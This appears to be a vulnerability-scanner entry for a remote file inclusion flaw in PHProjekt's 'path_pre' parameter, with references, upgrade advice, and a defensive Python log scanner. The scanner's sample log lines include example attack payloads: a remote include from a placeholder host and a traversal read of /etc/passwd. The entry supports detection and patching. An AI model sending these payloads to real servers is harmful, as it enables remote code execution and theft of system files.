VID: 21878
Severity: 40
Port: 80, ...
Protocol: TCP
Class: CGI
Detailed Description
PHProjekt is vulnerable to a remote file inclusion via the 'path_pre' parameter. PHProjekt is an open-source groupware package written in PHP 4. PHProjekt 4.2.1 and earlier fail to validate user-supplied input passed in the 'path_pre' parameter of the 'lib/authform.inc.php' script before using it as the path of an include. If PHP's 'register_globals' setting is enabled, the query-string parameter becomes the PHP variable the script includes from, so a remote attacker can send a specially crafted URL whose 'path_pre' value points at an attacker-controlled file and thereby execute arbitrary PHP code, and through it operating system commands, with the privileges of the web server. Remote inclusion additionally depends on PHP's 'allow_url_fopen' setting (enabled by default in PHP 4); with it disabled the same missing validation still allows files already on the host to be included.
* References: http://www.phprojekt.com/modules.php?op=modload&name=News&file=article&sid=193 http://secunia.com/advisories/13660/
* Platforms Affected: PHProjekt versions prior to 4.2.3, on any operating system and any version
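A defensive check that follows from the description, added here as an example and not code from PHProjekt, the advisory or this entry: it scans web-server access-log lines for requests to 'lib/authform.inc.php' whose 'path_pre' query parameter carries a remote URL or a path-traversal payload, and includes a small version check against the fixed release named above. The log lines are constructed for the example, and everything it can see is limited to GET parameters; with 'register_globals' on, the same variable can also arrive in a POST body or a cookie, which an access log does not record, so this is a triage aid rather than a substitute for upgrading.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache "combined" format (not real traffic).
# Lines 1 and 3 carry the payload shapes a remote/local file include would use;
# lines 2 and 4 are ordinary requests and must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Dec/2004:10:01:02 +0000] "GET /phprojekt/lib/authform.inc.php?path_pre=http://198.51.100.7/x.txt HTTP/1.0" 200 512 "-" "Mozilla/4.0"
192.0.2.10 - - [28/Dec/2004:10:01:05 +0000] "GET /phprojekt/index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.5 - - [28/Dec/2004:10:01:09 +0000] "GET /phprojekt/lib/authform.inc.php?path_pre=../../../../etc/passwd%00 HTTP/1.0" 200 512 "-" "Mozilla/4.0"
192.0.2.11 - - [28/Dec/2004:10:02:00 +0000] "GET /phprojekt/lib/authform.inc.php?path_pre=lib/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Any URL scheme at the start of the value (http://, https://, ftp://, ...).
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)
FIXED_VERSION = (4, 2, 3)  # first fixed release according to this entry


def classify_path_pre(value: str) -> Optional[str]:
    """Return why a decoded path_pre value looks hostile, or None if benign."""
    if SCHEME_RE.match(value):
        return "remote URL in path_pre (remote file include)"
    if ".." in value or "\x00" in value:
        return "traversal or NUL byte in path_pre (local file include)"
    return None


def scan_log(text: str) -> List[Dict[str, str]]:
    """Flag requests to lib/authform.inc.php whose path_pre looks like an include payload."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/lib/authform.inc.php"):
            continue
        # parse_qs percent-decodes once, so %00 becomes a real NUL here.
        for value in parse_qs(url.query, keep_blank_values=True).get("path_pre", []):
            reason = classify_path_pre(value)
            if reason:
                hits.append({"ip": m["ip"], "time": m["ts"], "status": m["status"],
                             "value": value, "reason": reason})
    return hits


def is_affected(version: str) -> bool:
    """True for PHProjekt versions below 4.2.3 (dotted numeric versions only)."""
    parts = tuple(int(p) for p in version.split("."))
    return parts < FIXED_VERSION


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} status={hit['status']} {hit['reason']}: {hit['value']!r}")
    for v in ("4.2.1", "4.2.3"):
        print(v, "affected" if is_affected(v) else "fixed")
```

Run it against a real access log by passing the file contents to scan_log(); the status column is kept in each hit because a 200 on a request whose path_pre names a remote URL is the case worth treating as a likely compromise rather than a blocked probe.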
Recommendation
Upgrade to the latest version of PHProjekt (4.2.3 or later), available from the PHProjekt Web site at http://www.phprojekt.com/
-- OR --
Apply the fix for this vulnerability, as listed in the PHProjekt advisory dated 2004-12-28 at http://www.phprojekt.com/modules.php?op=modload&name=News&file=article&sid=193
For Gentoo Linux: Upgrade to the latest version of phprojekt (4.2-r2 or later), as listed in Gentoo Linux Security Advisory GLSA 200412-27 at http://www.gentoo.org/security/en/glsa/glsa-200412-27.xml
Related URL: CVE-2004-2740 (CVE)
Related URL: 12116 (SecurityFocus)
Related URL: 18683 (ISS)